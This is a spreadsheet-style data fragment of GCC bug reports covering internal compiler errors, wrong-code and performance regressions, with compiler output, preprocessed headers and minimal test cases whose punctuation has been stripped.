# 48 ../../gcc/gcc/system.h 2
# 1 include/stdio.h 1 3 4
# 37 include/stdio.h 3 4
# 1 /usr/include/features.h 1 3 4
# 291 /usr/include/features.h 3 4
# 1 /usr/include/sys/cdefs.h 1 3 4
# 292 /usr/include/features.h 2 3 4
# 320 /usr/include/features.h 3 4
# 1 /usr/include/gnu/stubs.h 1 3 4
# 321 /usr/include/features.h 2 3 4
# 38 include/stdio.h 2 3 4
# 1 include/stddef.h 1 3 4
# 44 include/stdio.h 2 3 4
# 1 /usr/include/bits/types.h 1 3 4
# 29 /usr/include/bits/types.h 3 4
# 1 include/stddef.h 1 3 4
# 30 /usr/include/bits/types.h 2 3 4
# 1 /usr/include/bits/wordsize.h 1 3 4
# 31 /usr/include/bits/types.h 2 3 4
typedef unsigned char __u_char
typedef unsigned short int __u_short
typedef unsigned int __u_int
typedef unsigned long int __u_long
__extension__ typedef unsigned long long int __u_quad_t
__extension__ typedef long long int __quad_t
# 55 /usr/include/bits/types.h 3 4
typedef signed char __int8_t
typedef unsigned char __uint8_t
typedef signed short int __int16_t
typedef unsigned short int __uint16_t
typedef signed int __int32_t
typedef unsigned int __uint32_t
__extension__ typedef signed long long int __int64_t
__extension__ typedef unsigned long long int __uint64_t
typedef __quad_t *__qaddr_t
typedef __u_quad_t __dev_t
typedef __u_int __uid_t
typedef __u_int __gid_t
typedef __u_long __ino_t
typedef __u_quad_t __ino64_t
typedef __u_int __mode_t
typedef __u_int __nlink_t
typedef long int __off_t
typedef __quad_t __off64_t
typedef __quad_t __loff_t
typedef int __pid_t
typedef int __ssize_t
typedef __u_long __rlim_t
typedef __u_quad_t __rlim64_t
typedef __u_int __id_t
typedef struct
  {
    int __val[2]
  } __fsid_t
typedef int __daddr_t
typedef char *__caddr_t
typedef long int __time_t
typedef unsigned int __useconds_t
typedef int __suseconds_t
typedef long int __swblk_t
typedef long int __clock_t
typedef int __clockid_t
typedef int __timer_t
typedef int __key_t
typedef unsigned short int __ipc_pid_t
typedef long int __blksize_t
typedef long int __blkcnt_t
typedef __quad_t __blkcnt64_t
typedef __u_long __fsblkcnt_t
typedef __u_quad_t __fsblkcnt64_t
typedef unsigned long int __fsfilcnt_t
typedef __u_quad_t __fsfilcnt64_t
typedef long int __t_scalar_t
typedef unsigned long int __t_uscalar_t
typedef int __intptr_t
typedef unsigned int __socklen_t
# 1 /usr/include/bits/pthreadtypes.h 1 3 4
# 23 /usr/include/bits/pthreadtypes.h 3 4
# 1 /usr/include/bits/sched.h 1 3 4
# 68 /usr/include/bits/sched.h 3 4
struct __sched_param
  {
    int __sched_priority
  }
# 24 /usr/include/bits/pthreadtypes.h 2 3 4
struct _pthread_fastlock
{
  long int __status
  int __spinlock
}
typedef struct _pthread_descr_struct *_pthread_descr
typedef struct __pthread_attr_s
{
  int __detachstate
  int __schedpolicy
  struct __sched_param __schedparam
  int __inheritsched
  int __scope
  size_t __guardsize
  int __stackaddr_set
  void *__stackaddr
  size_t __stacksize
} pthread_attr_t
typedef struct
{
  struct _pthread_fastlock __c_lock
  _pthread_descr __c_waiting
} pthread_cond_t
typedef struct
{
  int __dummy
} pthread_condattr_t
typedef unsigned int pthread_key_t
typedef struct
{
  int __m_reserved
  int __m_count
  _pthread_descr __m_owner
  int __m_kind
  struct _pthread_fastlock __m_lock
} pthread_mutex_t
typedef struct
{
  int __mutexkind
} pthread_mutexattr_t
typedef int pthread_once_t
typedef struct _pthread_rwlock_t
{
  struct _pthread_fastlock __rw_lock
  int __rw_readers
  _pthread_descr __rw_writer
  _pthread_descr __rw_read_waiting
  _pthread_descr __rw_write_waiting
  int __rw_kind
  int __rw_pshared
} pthread_rwlock_t
typedef struct
{
  int __lockkind
  int __pshared
} pthread_rwlockattr_t
typedef volatile int pthread_spinlock_t
typedef struct {
  struct _pthread_fastlock __ba_lock
  int __ba_required
  int __ba_present
  _pthread_descr __ba_waiting
} pthread_barrier_t
typedef struct {
  int __pshared
} pthread_barrierattr_t
typedef unsigned long int pthread_t
# 162 /usr/include/bits/types.h 2 3 4
# 46 include/stdio.h 2 3 4
# 54 include/stdio.h 3 4
typedef struct _IO_FILE FILE
# 64 include/stdio.h 3 4
typedef struct _IO_FILE __FILE
# 74 include/stdio.h 3 4
# 1 /usr/include/libio.h 1 3 4
# 32 /usr/include/libio.h 3 4
# 1 /usr/include/_G_config.h 1 3 4
# 14 /usr/include/_G_config.h 3 4
# 1 include/stddef.h 1 3 4
# 327 include/stddef.h 3 4
typedef unsigned int wint_t
# 15 /usr/include/_G_config.h 2 3 4
# 24 /usr/include/_G_config.h 3 4
# 1 /usr/include/wchar.h 1 3 4
# 48 /usr/include/wchar.h 3 4
# 1 include/stddef.h 1 3 4
# 49 /usr/include/wchar.h 2 3 4
# 1 /usr/include/bits/wchar.h 1 3 4
# 51 /usr/include/wchar.h 2 3 4
# 67 /usr/include/wchar.h 3 4
typedef struct
{
  int __count
  union
  {
    wint_t __wch
    char __wchb[4]
  } __value
} __mbstate_t
# 25 /usr/include/_G_config.h 2 3 4
typedef struct
{
  __off_t __pos
  __mbstate_t __state
} _G_fpos_t
typedef struct
{
  __off64_t __pos
  __mbstate_t __state
} _G_fpos64_t
# 44 /usr/include/_G_config.h 3 4
# 1 /usr/include/gconv.h 1 3 4
# 28 /usr/include/gconv.h 3 4
# 1 /usr/include/wchar.h 1 3 4
# 48 /usr/include/wchar.h 3 4
# 1 include/stddef.h 1 3 4
# 49 /usr/include/wchar.h 2 3 4
# 29 /usr/include/gconv.h 2 3 4
# 1 include/stddef.h 1 3 4
# 32 /usr/include/gconv.h 2 3 4
enum
{
  __GCONV_OK = 0
  __GCONV_NOCONV
  __GCONV_NODB
  __GCONV_NOMEM
  __GCONV_EMPTY_INPUT
  __GCONV_FULL_OUTPUT
  __GCONV_ILLEGAL_INPUT
  __GCONV_INCOMPLETE_INPUT
  __GCONV_ILLEGAL_DESCRIPTOR
  __GCONV_INTERNAL_ERROR
}
enum
{
  __GCONV_IS_LAST = 0x0001
  __GCONV_IGNORE_ERRORS = 0x0002
}
struct __gconv_step
struct __gconv_step_data
struct __gconv_loaded_object
struct __gconv_trans_data
typedef int (*__gconv_fct) (struct __gconv_step * struct __gconv_step_data *
                            __const unsigned char ** __const unsigned char *
                            unsigned char ** size_t * int int)
typedef int (*__gconv_init_fct) (struct __gconv_step *)
typedef void (*__gconv_end_fct) (struct __gconv_step *)
typedef int (*__gconv_trans_fct) (struct __gconv_step *
                                  struct __gconv_step_data * void *
                                  __const unsigned char *
                                  __const unsigned char **
                                  __const unsigned char * unsigned char **
                                  size_t *)
typedef int (*__gconv_trans_context_fct) (void * __const unsigned char *
                                          __const unsigned char *
                                          unsigned char * unsigned char *)
typedef int (*__gconv_trans_query_fct) (__const char * __const char ***
                                        size_t *)
typedef int (*__gconv_trans_init_fct) (void ** const char *)
typedef void (*__gconv_trans_end_fct) (void *)
struct __gconv_trans_data
{
  __gconv_trans_fct __trans_fct
  __gconv_trans_context_fct __trans_context_fct
  __gconv_trans_end_fct __trans_end_fct
  void *__data
  struct __gconv_trans_data *__next
}
struct __gconv_step
{
  struct __gconv_loaded_object *__shlib_handle
  __const char *__modname
  int __counter
  char *__from_name
  char *__to_name
  __gconv_fct __fct
  __gconv_init_fct __init_fct
  __gconv_end_fct __end_fct
  int __min_needed_from
  int __max_needed_from
  int __min_needed_to
  int __max_needed_to
  int __stateful
  void *__data
}
struct __gconv_step_data
{
  unsigned char *__outbuf
  unsigned char *__outbufend
  int __flags
  int __invocation_counter
  int __internal_use
  __mbstate_t *__statep
  __mbstate_t __state
  struct __gconv_trans_data *__trans
}
typedef struct __gconv_info
{
  size_t __nsteps
  struct __gconv_step *__steps
  __extension__ struct __gconv_step_data __data []
} *__gconv_t
# 45 /usr/include/_G_config.h 2 3 4
typedef union
{
  struct __gconv_info __cd
  struct
  {
    struct __gconv_info __cd
    struct __gconv_step_data __data
  } __combined
} _G_iconv_t
typedef int _G_int16_t __attribute__ ((__mode__ (__HI__)))
typedef int _G_int32_t __attribute__ ((__mode__ (__SI__)))
typedef unsigned int _G_uint16_t __attribute__ ((__mode__ (__HI__)))
typedef unsigned int _G_uint32_t __attribute__ ((__mode__ (__SI__)))
# 33 /usr/include/libio.h 2 3 4
# 160 /usr/include/libio.h 3 4
struct _IO_jump_t struct _IO_FILE
# 170 /usr/include/libio.h 3 4
typedef void _IO_lock_t
struct _IO_marker {
  struct _IO_marker *_next
  struct _IO_FILE *_sbuf
  int _pos
# 193 /usr/include/libio.h 3 4
}
enum __codecvt_result
{
  __codecvt_ok
  __codecvt_partial
  __codecvt_error
  __codecvt_noconv
}
# 261 /usr/include/libio.h 3 4
struct _IO_FILE {
  int _flags
  char* _IO_read_ptr
  char* _IO_read_end
  char* _IO_read_base
  char* _IO_write_base
  char* _IO_write_ptr
  char* _IO_write_end
  char* _IO_buf_base
  char* _IO_buf_end
  char *_IO_save_base
  char *_IO_backup_base
  char *_IO_save_end
  struct _IO_marker *_markers
  struct _IO_FILE *_chain
  int _fileno
  int _blksize
  __off_t _old_offset
  unsigned short _cur_column
  signed char _vtable_offset
  char _shortbuf[1]
  _IO_lock_t *_lock
# 305 /usr/include/libio.h 3 4
  __off64_t _offset
  void *__pad1
  void *__pad2
  int _mode
  char _unused2[15 * sizeof (int) - 2 * sizeof (void *)]
}
typedef struct _IO_FILE _IO_FILE
struct _IO_FILE_plus
extern struct _IO_FILE_plus _IO_2_1_stdin_
extern struct _IO_FILE_plus _IO_2_1_stdout_
extern struct _IO_FILE_plus _IO_2_1_stderr_
# 344 /usr/include/libio.h 3 4
typedef __ssize_t __io_read_fn (void *__cookie char *__buf size_t __nbytes)
typedef __ssize_t __io_write_fn (void *__cookie __const char *__buf
                                 size_t __n)
typedef int __io_seek_fn (void *__cookie __off64_t *__pos int __w)
typedef int __io_close_fn (void *__cookie)
typedef __io_read_fn cookie_read_function_t
typedef __io_write_fn cookie_write_function_t
typedef __io_seek_fn cookie_seek_function_t
typedef __io_close_fn cookie_close_function_t
typedef struct
{
  __io_read_fn *read
  __io_write_fn *write
  __io_seek_fn *seek
  __io_close_fn *close
} _IO_cookie_io_functions_t
typedef _IO_cookie_io_functions_t cookie_io_functions_t
struct _IO_cookie_file
extern void _IO_cookie_init (struct _IO_cookie_file *__cfile int __read_write
                             void *__cookie _IO_cookie_io_functions_t __fns)
extern int __underflow (_IO_FILE *) 
extern int __uflow (_IO_FILE *) 
extern int __overflow (_IO_FILE * int) 
extern wint_t __wunderflow (_IO_FILE *) 
extern wint_t __wuflow (_IO_FILE *) 
extern wint_t __woverflow (_IO_FILE * wint_t) 
# 426 /usr/include/libio.h 3 4
extern int _IO_getc (_IO_FILE *__fp) 
extern int _IO_putc (int __c _IO_FILE *__fp) 
extern int _IO_feof (_IO_FILE *__fp) 
extern int _IO_ferror (_IO_FILE *__fp) 
extern int _IO_peekc_locked (_IO_FILE *__fp) 
extern void _IO_flockfile (_IO_FILE *) 
extern void _IO_funlockfile (_IO_FILE *) 
extern int _IO_ftrylockfile (_IO_FILE *) 
# 456 /usr/include/libio.h 3 4
extern int _IO_vfscanf (_IO_FILE * __restrict const char * __restrict
                        __gnuc_va_list int *__restrict) 
extern int _IO_vfprintf (_IO_FILE *__restrict const char *__restrict
                         __gnuc_va_list) 
extern __ssize_t _IO_padn (_IO_FILE * int __ssize_t) 
extern size_t _IO_sgetn (_IO_FILE * void * size_t) 
extern __off64_t _IO_seekoff (_IO_FILE * __off64_t int int) 
extern __off64_t _IO_seekpos (_IO_FILE * __off64_t int) 
extern void _IO_free_backup_area (_IO_FILE *) 
# 75 include/stdio.h 2 3 4
typedef __gnuc_va_list __not_va_list__
# 89 include/stdio.h 3 4
typedef _G_fpos_t fpos_t
typedef _G_fpos64_t fpos64_t
# 138 include/stdio.h 3 4
# 1 /usr/include/bits/stdio_lim.h 1 3 4
# 139 include/stdio.h 2 3 4
extern FILE *stdin
extern FILE *stdout
extern FILE *stderr
# 153 include/stdio.h 3 4
extern int remove (__const char *__filename) 
extern int rename (__const char *__old __const char *__new) 
extern FILE *tmpfile (void) 
# 169 include/stdio.h 3 4
extern FILE *tmpfile64 (void) 
extern char *tmpnam (char *__s) 
extern char *tmpnam_r (char *__s) 
# 189 include/stdio.h 3 4
extern char *tempnam (__const char *__dir __const char *__pfx)
     __attribute__ ((__malloc__))
extern int fclose (FILE *__stream) 
extern int fflush (FILE *__stream) 
extern int fflush_unlocked (FILE *__stream) 
extern int fcloseall (void) 
extern FILE *fopen (__const char *__restrict __filename
                    __const char *__restrict __modes) 
extern FILE *freopen (__const char *__restrict __filename
                      __const char *__restrict __modes
                      FILE *__restrict __stream) 
# 233 include/stdio.h 3 4
extern FILE *fopen64 (__const char *__restrict __filename
                      __const char *__restrict __modes) 
extern FILE *freopen64 (__const char *__restrict __filename
                        __const char *__restrict __modes
                        FILE *__restrict __stream) 
extern FILE *fdopen (int __fd __const char *__modes) 
extern FILE *fopencookie (void *__restrict __magic_cookie
                          __const char *__restrict __modes
                          _IO_cookie_io_functions_t __io_funcs) 
extern FILE *fmemopen (void *__s size_t __len __const char *__modes) 
extern FILE *open_memstream (char **__restrict __bufloc
                             size_t *__restrict __sizeloc) 
extern void setbuf (FILE *__restrict __stream char *__restrict __buf) 
extern int setvbuf (FILE *__restrict __stream char *__restrict __buf
                    int __modes size_t __n) 
extern void setbuffer (FILE *__restrict __stream char *__restrict __buf
                       size_t __size) 
extern void setlinebuf (FILE *__stream) 
extern int fprintf (FILE *__restrict __stream
                    __const char *__restrict __format ...) 
extern int printf (__const char *__restrict __format ...) 
extern int sprintf (char *__restrict __s
                    __const char *__restrict __format ...) 
extern int vfprintf (FILE *__restrict __s __const char *__restrict __format
                     __gnuc_va_list __arg) 
extern int vprintf (__const </t>
  </si>
  <si>
    <t>GCC-6544</t>
  </si>
  <si>
    <t>G++ and illegal code: Internal compiler error in pop_binding at cp/decl.c:1187</t>
  </si>
  <si>
    <t>ICE on illegal code in latest G++ CVS version. G++-3.0.4 doesn't give ICE. Full preprocessed source code is shown in the How-To-Repeat section.
Full compiler output of g++ -v -save-temps -c test.cc follows:
Reading specs from /home/js/opt/gcc-cvs/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
Configured with: ../gcc/configure --prefix=/home/js/opt/gcc-cvs
Thread model: single
gcc version 3.2 20020502 (experimental)
 /home/js/opt/gcc-cvs/lib/gcc-lib/i686-pc-linux-gnu/3.2/cc1plus -E -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -quiet -v -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ test.cc test.ii
GNU CPP version 3.2 20020502 (experimental) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /home/js/opt/gcc-cvs/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /home/js/opt/gcc-cvs/include/g++-v3
 /home/js/opt/gcc-cvs/include/g++-v3/i686-pc-linux-gnu
 /home/js/opt/gcc-cvs/include/g++-v3/backward
 /usr/local/include
 /home/js/opt/gcc-cvs/include
 /home/js/opt/gcc-cvs/lib/gcc-lib/i686-pc-linux-gnu/3.2/include
 /usr/include
End of search list.
 /home/js/opt/gcc-cvs/lib/gcc-lib/i686-pc-linux-gnu/3.2/cc1plus -fpreprocessed test.ii -quiet -dumpbase test.cc -version -o test.s
GNU CPP version 3.2 20020502 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.2 20020502 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 3.2 20020502 (experimental).
test.cc:1: warning: all member functions in class `X' are private
test.cc:2: no `X::X()' member function declared in class `X'
test.cc:2: template definition of non-template `X::X()'
test.cc: In constructor `X::X()':
test.cc:2: parse error before `' token
test.cc:2: ISO C++ forbids declaration of `y' with no type
test.cc:2: parse error before `}' token
test.cc: In function `int foo()':
test.cc:3: Internal compiler error in pop_binding at cp/decl.c:1187
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.2 20020502 (experimental)
Environment:
Debian Linux x86
How-To-Repeat:
# 1 test.cc
# 1 
# 1 
# 1 test.cc
template class X { void y() }
template inline X::X() { y() y() }
int foo() {}</t>
  </si>
  <si>
    <t>GCC-80493</t>
  </si>
  <si>
    <t>std::experimental::optional::swap is ill formed</t>
  </si>
  <si>
    <t>From std::experimental::optional:
      void
      swap(optional&amp; __other)
      noexcept(is_nothrow_move_constructible()
               &amp;&amp; noexcept(swap(declval() declval())))
      {
The operand to the noexcept operator calls swap(T but that is hidden by optional::swap(optional&amp;).  Clang correctly rejects this code but g++ accepts it.</t>
  </si>
  <si>
    <t>GCC-23322</t>
  </si>
  <si>
    <t>[4.3 regression] performance regression</t>
  </si>
  <si>
    <t>We ran the bench++ suite mentioned as well in
http://gcc.gnu.org/ml/gcc/2005-08/msg00197.html 
using -O2 and we noticed one more interesting case.
Namely S000005m runs slower (x4) when compiled with
g++-4.0.1 than when compiled with either g++-2.95.3
or g++-4.1.0-20050723.
This regression does not occur when -O3 is used.
Apparently it is related to the existance of a
*dead* cerr as changing the cerr to printf makes
the regression go away and the assembly shorter.
Is this a caching effect?</t>
  </si>
  <si>
    <t>danalis</t>
  </si>
  <si>
    <t>GCC-58867</t>
  </si>
  <si>
    <t>asan and ubsan tests not run for installed testing</t>
  </si>
  <si>
    <t>gcc.dg/asan/asan.exp checks if asan_init succeeds before running anything and likewise for gcc.dg/ubsan/ubsan.exp.  Success is determined in asan_init as meaning that a nonempty set of link flags was produced.  But for installed toolchain testing the logic for finding like flags won't find any and this doesn't matter - the library will already be installed where the installed compiler can find it and LD_LIBRARY_PATH is the board file's responsibility.  Thus the right way to test for success is whether a test file can be successfully linked with the determined options not whether the determined options are nonempty.</t>
  </si>
  <si>
    <t>GCC-42427</t>
  </si>
  <si>
    <t>[4.5 Regression] invalid assembly code for 301.apsi for -fnon-call-exceptions</t>
  </si>
  <si>
    <t>GCC trunk gets a ICE when building SPEC CPU2000 test 301.apsi with -O2 -fnon-call-exceptions -fpeel-loops -fexceptions as demonstrated by this minimized testcase:
      SUBROUTINE TEST(HELPWMNZ)
      IMPLICIT REAL*8 (A-H O-Z)
      REAL*8 HELP(NZ)
      COMPLEX*16 WM(NZ)
      DO K=1NZ
         ZNEW=ABS(WM(K))
         ZOLD=HELP(K)
         HELP(K)=ZNEW
      ENDDO
      RETURN
      END
elm3b149% /home/janis/tools/gcc-trunk-anonsvn/bin/gfortran -c -O2 -fexceptions -fnon-call-exceptions -fpeel-loops bug.f
/tmp/ccZKTZkM.s: Assembler messages:
/tmp/ccZKTZkM.s:38: Error: syntax error found `' but expected `('
/tmp/ccZKTZkM.s:38: Error: junk at end of line: `3
The assembly code here is:
        lwz 44(9)
        lwz 393           &lt;---- line 38
        lwz 58(9)
        lwz 612(9)
        bl cabs
The failure begins with this patch:
    http://gcc.gnu.org/viewcvs?view=rev&amp;rev=154688
    r154688 | bernds | 2009-11-26 21:41:42 +0000 (Thu 26 Nov 2009)
I ran into this by running CPU2000 with a number of sets of options generated by a tool called allpairs.</t>
  </si>
  <si>
    <t>GCC-66275</t>
  </si>
  <si>
    <t>__attribute__((sysv_abi)) with x86_64-w64-mingw32-gcc generates incorrect code</t>
  </si>
  <si>
    <t>Created attachment 35615
main.c asm-test.h and less-stripped-down intrin-pinsrw.c
gcc (Ubuntu 4.9.2-10ubuntu13) 4.9.2
w64 mingw gcc is mis-compiling functions declared with __attribute__((sysv_abi)).  Registers holding args are getting clobbered with temp values but then used as if they still held function args.
This code is mis-compiled by
x86_64-w64-mingw32-gcc -g -Wall -funroll-loops -O3 -std=gnu11 intrin-pinsrw.c ... main.c
cat &gt; intrin-pinsrw.c &lt;&lt;EOF
#include 
#include 
#define SYSV_ABI __attribute__((sysv_abi))
union wordbytes { uint16_t w uint8_t b[2] }
void SYSV_ABI rs_process_pinsrw_intrin(void* dstvoid const void* srcvoid size_t size const uint32_t* LH)
{
	const uint64_t *src = srcvoid
	__m128i d l h
	__m128i *dst = dstvoid
	for (size_t i = 0 i &lt; size/sizeof(d)  i+=1) {
		uint64_t s0 = src[i*2 + 0]
#define LO(x) ((uint8_t)x)
#define HI(x) (( (union wordbytes) ((uint16_t)x) ).b[1])
		l = _mm_cvtsi32_si128( LH[      LO(s0)] )
		h = _mm_cvtsi32_si128( LH[256 + HI(s0)] )
		s0 &gt;&gt;= 16
 // commented-out code that wasn't needed to trigger the bug
		d = _mm_xor_si128(l h)
		d = _mm_xor_si128(d dst[i])
		_mm_store_si128(
	}
}
EOF
x86_64-w64-mingw32-gcc -Wall -funroll-loops -O3 -std=gnu11 intrin-pinsrw.c -S
search for si in the output and notice how %rsi is used as a pointer to load src data but also used as a tmp.
.L5:
        movq    (%rsi%r10) %rdx
        movzbl  %dl %esi              ## clobbered here
        movzbl  %dh %eax
        movd    (%rcx%rsi4) %xmm8
        movd    1024(%rcx%rax4) %xmm9
        pxor    %xmm8 %xmm9
        pxor    (%rdi%r10) %xmm9
        movaps  %xmm9 (%rdi%r10)
        movq    16(%rsi%r10) %rdx    ## not restored after use as a tmp
        ...
%rdi is also clobbered and then used as a pointer again later in the loop.
In the AMD64 sysv ABI %rdi holds the 1st arg %rsi holds the 2nd %rdx holds the 3rd and %rcx holds the 4th.  
(and see attached for a less-stripped-down and a main.c to call it)
-funroll-loops is needed to trigger the problem on this reduced test-case.  It might not be needed with a bigger function that would run out of registers without unrolling.  Even the less-stripped-down version in the attachment runs fine under WINE when compiled without -funroll-loops.
If testing by actually running the code with WINE note that wine and wine64
seem to have incompatible requirements for the contents of ~/.wine.  I eventually made a wrapper like:
 #!/bin/sh
 WINEPREFIX=~/.wine64 /usr/bin/wine64 $@
For anyone curious why I had this code in the first place:
This code is from par2 (the reed-solomon inner-loop that multiplies a buffer of GF16 values by a constant factor using a pre-computed lookup table).  See https://github.com/pcordes/par2-asm-experiments
 I have some functions written directly in asm.  They're written for the Linux SysV ABI.  I could make an alternate entry point for win ABI with extra mov instructions and push/pop the extra regs that are callee-save in MS-ABI but not SYSV.  Or I could just declare their prototypes with __attribute__((sysv_abi)) and gcc will call them properly.
I tried making a version of the function using intrinsics so of course my test harness needs to call it too.  Since I call via function pointer I had to declare it the same way.
It was working fine until a recent change to the code of the function.  Old version that didn't tickle this bug (partial diff):
-	uint64_t s0 s1
-	for (size_t i = 0 i &lt; size  i+=16) {
-		s0 = *((uint64_t*) ((char*)srcvoid + i))	// byte address math 64bit load
-		s1 = *((uint64_t*) ((char*)srcvoid+8 + i))	// byte address math 64bit load
- 		d = _mm_xor_si128(d *(dst+i/16))
-		_mm_store_si128(dst+i/16 d)
I wrote it in that ugly way initially because I was basically porting my ASM code to intrinsics.  BTW the results were terrible.  gcc generates ridiculously bad code for getting the src bytes into zero-extended 64bit regs for use as scaled-offsets in an address compared to
movzx %dl %eax
movxz %dh %ebx
shr   $16 %rdx
use rax/rbx
movzx %dl %eax
movxz %dh %ebx
shr   $16 %rdx
use rax/rbx
 ...
 gcc never just shifts the reg holding src data.  Instead if copies and shifts the copy by $16 $32 or $48.
 gcc's code is about 35% slower than the hand-written version even letting it use avx so it doesn't emit useless movdqa instructions when it doesn't realize that an old value is no longer needed.  Just un-comment the mostly-commented loop body in the testcase (attachment version).
 Anyway slow code is off-topic this bug is about wrong code!</t>
  </si>
  <si>
    <t>GCC-81675</t>
  </si>
  <si>
    <t>[6 Regression] attribute(noreturn) of destructor in :? not honored</t>
  </si>
  <si>
    <t>cat &gt; t.cc &lt;&lt; EOF
struct S
{
    ~S() __attribute__((noreturn))
    int a
}
int foo()
{
  false ? 5 : S().a
}
EOF
g++ -c -Wall t.cc
GCC 6.2.0 prints:
t.cc: In function 'int foo()':
t.cc:9:1: warning: control reaches end of non-void function [-Wreturn-type]
GCC 5.3.0 seems to detect correctly that foo() will never return.</t>
  </si>
  <si>
    <t>GCC-38561</t>
  </si>
  <si>
    <t>[4.4 Regression]  Revision 142799 may cause C++ demangle failures</t>
  </si>
  <si>
    <t>On Linux/Intel64 I got
FAIL at line 3615 options --format=gnu-v3 --no-params:
FAIL at line 3621 options --format=gnu-v3 --no-params:
FAIL: abi/demangle/regression/cw-16.cc execution test
FAIL: abi/demangle/regression/cw-16.cc execution test
FAIL: g++.dg/cpp0x/auto12.C scan-assembler _ZN1AIiE1gIiEEDTplsTT_sRjES2_</t>
  </si>
  <si>
    <t>GCC-7239</t>
  </si>
  <si>
    <t>g++ rejects pointer to own class type in throw statement</t>
  </si>
  <si>
    <t>G++ does not compile any class that has a pointer to its own class type as an
exception type in the throw specification of a member function.
Release:
3.0.2
Environment:
System: SunOS hydra 5.6 Generic_105181-16 sun4u sparc SUNWUltra-2
Architecture: sun4
host: sparc-sun-solaris2.6
build: sparc-sun-solaris2.6
target: sparc-sun-solaris2.6
configured with: ../gcc/configure --prefix=/work/hyd01/td/sw/gcc_3_0_2_release --disable-nls --disable-threads --disable-shared --enable-languages=cc++f77objc
How-To-Repeat:
Assume the file bug.cc contains the following three lines:
struct X {
  void f() throw (X*) { throw this}
}
Then the command g++ -c bug.cc creates the error message
bug.cc:2: invalid use of undefined type `struct X'
bug.cc:1: forward declaration of `struct X'
g++ -c -E bug.cc reports:
# 1 bug.cc
struct X {
  void f() throw (X*) { throw this}
}</t>
  </si>
  <si>
    <t>GCC-66508</t>
  </si>
  <si>
    <t>Attempt to Compile gcc-6.0 on OSX 10.9.4 cause segmentation fault</t>
  </si>
  <si>
    <t>Created attachment 35757
config.log file
Compiler being used is: clang-600.0.56
Build with command line command:
cd ~/src/build/gcc &amp;&amp; rm -rf *
~/src/gcc/configure --prefix=$HOME/sandbox --enable-languages=c++ --enable-checking=release &gt; /dev/null 2&gt;/dev/null
/usr/bin/time make -j11 bootstrap &gt; out.log 2&gt; err.log
It cause segmentation fault when process
configure:3462: /Users/jieyuandai/src/build/gcc/./gcc/xgcc -B/Users/jieyuandai/src/build/gcc/./gcc/ -B/usr/local/x86_64-apple-darwin13.3.0/bin/ -B/usr/local/x86_64-apple-darwin13.3.0/lib/ -isystem /usr/local/x86_64-apple-darwin13.3.0/include -isystem /usr/local/x86_64-apple-darwin13.3.0/sys-include    -o conftest -g -O2   conftest.c  &gt;&amp;5
: internal compiler error: Segmentation fault: 11
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>youfan.noey</t>
  </si>
  <si>
    <t>GCC-56268</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] C++11 ICE with boost multi-precision and boost variant during assignment</t>
  </si>
  <si>
    <t>Created attachment 29402
Sample code to reproduce the problem
This issue is quite similar to bug 55842.
Compiling the attached sample file leads to an internal compiler error.
The problem only occurs with GCC-4.7 from Debian Unstable 4.7.2-5 and the
upcoming 4.8 from Debian Experimental 4.8-20130127-1. Tested on an amd64
system. (GCC 4.6 works properly.)
I'm using a checkout of the latest boost release tree.
The command to reproduce the issue is:
gcc-4.8 -std=c++11 -c -I/src/boost/release test.cpp
In file included from /src/boost/release/boost/config.hpp:57:0
                 from /src/boost/release/boost/variant/detail/config.hpp:16
                 from /src/boost/release/boost/variant/variant.hpp:23
                 from /src/boost/release/boost/variant.hpp:17
                 from test.cpp:2:
/src/boost/release/boost/type_traits/has_nothrow_copy.hpp: In instantiation of 'const bool boost::detail::has_nothrow_copy_imp &gt; &gt;::value':
/src/boost/release/boost/type_traits/has_nothrow_copy.hpp:32:1:   required from 'struct boost::has_nothrow_copy &gt; &gt;'
/src/boost/release/boost/variant/variant.hpp:1908:17:   required from 'void boost::variant::assigner::internal_visit(const RhsT T0_ = boost::multiprecision::number &gt; T1 = boost::detail::variant::void_ T2 = boost::detail::variant::void_ T3 = boost::detail::variant::void_ T4 = boost::detail::variant::void_ T5 = boost::detail::variant::void_ T6 = boost::detail::variant::void_ T7 = boost::detail::variant::void_ T8 = boost::detail::variant::void_ T9 = boost::detail::variant::void_ T10 = boost::detail::variant::void_ T11 = boost::detail::variant::void_ T12 = boost::detail::variant::void_ T13 = boost::detail::variant::void_ T14 = boost::detail::variant::void_ T15 = boost::detail::variant::void_ T16 = boost::detail::variant::void_ T17 = boost::detail::variant::void_ T18 = boost::detail::variant::void_ T19 = boost::detail::variant::void_]'
/src/boost/release/boost/variant/detail/visitation_impl.hpp:130:9:   required from 'typename Visitor::result_type boost::detail::variant::visitation_impl_invoke_impl(int Visitor VoidPtrCV = const void* T = boost::multiprecision::number &gt; typename Visitor::result_type = void mpl_::true_ = mpl_::bool_]'
/src/boost/release/boost/variant/detail/visitation_impl.hpp:173:9:   required from 'typename Visitor::result_type boost::detail::variant::visitation_impl_invoke(int Visitor VoidPtrCV = const void* T = boost::multiprecision::number &gt; NoBackupFlag = boost::variant &gt; &gt;::has_fallback_type_ typename Visitor::result_type = void]'
/src/boost/release/boost/variant/detail/visitation_impl.hpp:256:5:   required from 'typename Visitor::result_type boost::detail::variant::visitation_impl(int int Visitor step0 = boost::detail::variant::visitation_impl_step boost::multiprecision::number &gt; boost::mpl::l_end&gt; &gt; boost::mpl::l_iter &gt; Visitor = boost::variant &gt; &gt;::assigner VoidPtrCV = const void* NoBackupFlag = boost::variant &gt; &gt;::has_fallback_type_ typename Visitor::result_type = void mpl_::false_ = mpl_::bool_]'
